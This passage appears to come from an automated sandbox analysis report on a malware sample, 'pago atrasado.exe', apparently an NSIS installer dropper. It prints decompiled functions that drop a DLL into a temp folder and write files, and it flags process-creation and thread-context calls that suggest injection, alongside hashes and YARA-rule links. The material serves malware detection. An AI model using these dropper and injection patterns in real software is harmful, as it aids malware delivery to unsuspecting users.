                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\pago atrasado.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                            • API String ID: 4283519449-3784839127
                                            • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                            • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                            • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                            • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\alfons\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                            0x00401751
                                            0x00401758
                                            0x00401761
                                            0x00401764
                                            0x00401767
                                            0x0040176c
                                            0x00401774
                                            0x00401790
                                            0x00401776
                                            0x00401776
                                            0x00401777
                                            0x00401777
                                            0x00401796
                                            0x004017a0
                                            0x004017a0
                                            0x004017a4
                                            0x004017a7
                                            0x004017ac
                                            0x004017ae
                                            0x004017b0
                                            0x004017b5
                                            0x004017b5
                                            0x004017c0
                                            0x004017c0
                                            0x004017d1
                                            0x004017d3
                                            0x004017d3
                                            0x004017d4
                                            0x004017d4
                                            0x004017d7
                                            0x004017da
                                            0x004017dd
                                            0x004017dd
                                            0x004017e4
                                            0x004017f3
                                            0x004017f8
                                            0x004017fb
                                            0x004017fe
                                            0x00000000
                                            0x00000000
                                            0x00401800
                                            0x00401803
                                            0x0040185d
                                            0x00401862
                                            0x004015a8
                                            0x0040268f
                                            0x0040268f
                                            0x004028be
                                            0x004028c1
                                            0x004028c1
                                            0x00000000
                                            0x00401805
                                            0x0040180b
                                            0x00401816
                                            0x00401823
                                            0x0040182e
                                            0x00401844
                                            0x00401844
                                            0x00401847
                                            0x00000000
                                            0x0040184d
                                            0x0040184d
                                            0x0040184e
                                            0x0040186b
                                            0x004028c7
                                            0x004028c7
                                            0x004028c7
                                            0x00401850
                                            0x00401850
                                            0x00401851
                                            0x00401492
                                            0x00402241
                                            0x00402241
                                            0x00402241
                                            0x0040184e
                                            0x00401847
                                            0x004028c9
                                            0x004028cd
                                            0x004028cd
                                            0x0040187b
                                            0x00401880
                                            0x00401886
                                            0x00401887
                                            0x00401888
                                            0x0040188b
                                            0x0040188e
                                            0x00401893
                                            0x00401899
                                            0x0040189d
                                            0x0040189f
                                            0x004018a7
                                            0x004018b3
                                            0x004018a1
                                            0x004018a1
                                            0x004018a5
                                            0x00000000
                                            0x00000000
                                            0x004018a5
                                            0x004018bc
                                            0x004018c2
                                            0x004018c4
                                            0x00000000
                                            0x004018ca
                                            0x004018ca
                                            0x004018cd
                                            0x004018e5
                                            0x004018cf
                                            0x004018d2
                                            0x004018db
                                            0x004018db
                                            0x004018ea
                                            0x004018ef
                                            0x0040223c
                                            0x00000000
                                            0x0040223c
                                            0x00000000

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,cuwawvnlx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                            • CompareFileTime.KERNEL32(-00000014,?,cuwawvnlx,cuwawvnlx,00000000,00000000,cuwawvnlx,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                              • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,cuflzcqvvfgho Setup,NSIS Error), ref: 00405BA5
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsw7E57.tmp$C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll$cuwawvnlx
                                            • API String ID: 1941528284-2478133618
                                            • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                            • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                            • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                            • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x946d
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                                            0x00402e96
                                            0x00402e9a
                                            0x00402e9d
                                            0x00402ea2
                                            0x00402ea4
                                            0x00402ea4
                                            0x00402eab
                                            0x00402eaf
                                            0x00402eb3
                                            0x00402eb5
                                            0x00402eb5
                                            0x00402eba
                                            0x00402ebf
                                            0x00402ec1
                                            0x00402eca
                                            0x00402eca
                                            0x00402ed5
                                            0x00402edc
                                            0x0040302c
                                            0x0040302c
                                            0x00000000
                                            0x00402ee2
                                            0x00402ee6
                                            0x00403017
                                            0x0040306c
                                            0x00403031
                                            0x00403037
                                            0x00403039
                                            0x00403039
                                            0x0040304a
                                            0x00000000
                                            0x0040304c
                                            0x0040305f
                                            0x00403011
                                            0x00403011
                                            0x0040302e
                                            0x0040302e
                                            0x00000000
                                            0x00403066
                                            0x00403066
                                            0x00403069
                                            0x00000000
                                            0x00403069
                                            0x0040305f
                                            0x0040304a
                                            0x00403077
                                            0x00000000
                                            0x00403077
                                            0x0040301c
                                            0x0040301e
                                            0x0040301e
                                            0x0040302a
                                            0x00403074
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040302a
                                            0x00402ef7
                                            0x00402efa
                                            0x00402eff
                                            0x00402eff
                                            0x00402f09
                                            0x00402f0c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402f12
                                            0x00402f12
                                            0x00402f12
                                            0x00402f1a
                                            0x00402f1c
                                            0x00402f1c
                                            0x00402f2d
                                            0x00000000
                                            0x00000000
                                            0x00402f33
                                            0x00402f36
                                            0x00402f3c
                                            0x00402f42
                                            0x00402f4a
                                            0x00402f50
                                            0x00402f55
                                            0x00402f5c
                                            0x00402f5f
                                            0x00000000
                                            0x00000000
                                            0x00402f65
                                            0x00402f6b
                                            0x00402f6d
                                            0x00402f7a
                                            0x00402f7c
                                            0x00402faa
                                            0x00402fb0
                                            0x00402fb9
                                            0x00402fbe
                                            0x00402fbe
                                            0x00402fc5
                                            0x00403005
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402fc7
                                            0x00402fca
                                            0x00402fea
                                            0x00402fed
                                            0x00402ff0
                                            0x00402ff6
                                            0x00402ffa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403000
                                            0x00402fd6
                                            0x00402fde
                                            0x00000000
                                            0x00402fe5
                                            0x00402fe5
                                            0x00000000
                                            0x00402fe5
                                            0x00402fde
                                            0x00402fc5
                                            0x0040300d
                                            0x00000000
                                            0x0040300d
                                            0x00000000
                                            0x00402f12

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402EEC
                                            • GetTickCount.KERNEL32 ref: 00402F6D
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                            • wsprintfA.USER32 ref: 00402FAA
                                            • WriteFile.KERNEL32(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 4209647438-2449383134
                                            • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                            • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                            • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                            • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                            0x00405351
                                            0x00405355
                                            0x00405358
                                            0x0040535e
                                            0x00405362
                                            0x00405366
                                            0x0040536e
                                            0x00405375
                                            0x0040537b
                                            0x00405382
                                            0x00405389
                                            0x00405391
                                            0x00405393
                                            0x00000000
                                            0x00405393
                                            0x0040539d
                                            0x004053a4
                                            0x004053ba
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004053bc
                                            0x004053c0

                                            APIs
                                            • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                            • GetLastError.KERNEL32 ref: 0040539D
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                            • GetLastError.KERNEL32 ref: 004053BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop$Ls@$\s@
                                            • API String ID: 3449924974-776639217
                                            • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                            • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001AFF4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNEL32(?,00000000), ref: 1001B138
                                            • GetThreadContext.KERNEL32(?,00010007), ref: 1001B15B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ContextCreateProcessThread
                                            • String ID: D
                                            • API String ID: 2843130473-2746444292
                                            • Opcode ID: a1ee6b9165808dd86ecb6f52cc606ca6c21a90c47e25f96645d1c742f475e900
                                            • Instruction ID: 539a89a145bdbe1c91b6f9da7f541eb28d86d7eb560c16d0b10e8d65c56b68ef
                                            • Opcode Fuzzy Hash: a1ee6b9165808dd86ecb6f52cc606ca6c21a90c47e25f96645d1c742f475e900
                                            • Instruction Fuzzy Hash: C9A1E274E00209AFDB51DFA4C981BAEBBF5EF08344F204465E915EB291E730EA81DF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                            0x00405ed1
                                            0x00405eda
                                            0x00405edc
                                            0x00405edc
                                            0x00405ee0
                                            0x00405ef2
                                            0x00405eec
                                            0x00405eec
                                            0x00405eec
                                            0x00405ef6
                                            0x00405f0a
                                            0x00405f1e
                                            0x00405f25

                                            APIs
                                            • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                            • wsprintfA.USER32 ref: 00405F0A
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00405F1E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                            • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                            • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                            0x004058a2
                                            0x004058a8
                                            0x004058a9
                                            0x004058a9
                                            0x004058aa
                                            0x004058b1
                                            0x004058bb
                                            0x004058c8
                                            0x004058cb
                                            0x004058d3
                                            0x00000000
                                            0x00000000
                                            0x004058d7
                                            0x00000000
                                            0x00000000
                                            0x004058d9
                                            0x00000000
                                            0x004058d9
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 004058B1
                                            • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-2428704544
                                            • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                            • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                            • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A7DD, Relevance: 7.7, APIs: 5, Instructions: 177fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A96D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 6a76c7b9f7d3c9d3a6ec9dd3f7f98038fd81c041856c0fbbeada39e8650c3018
                                            • Instruction ID: 42b92da4ee14fc9a13e057689146698bdecd4bc0cd7aa704d178068b0762236e
                                            • Opcode Fuzzy Hash: 6a76c7b9f7d3c9d3a6ec9dd3f7f98038fd81c041856c0fbbeada39e8650c3018
                                            • Instruction Fuzzy Hash: D4614935E44248ABDB50CBE4EC56BEDB7B5EF48710F20801AE608EE2E0E7705E81DB05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
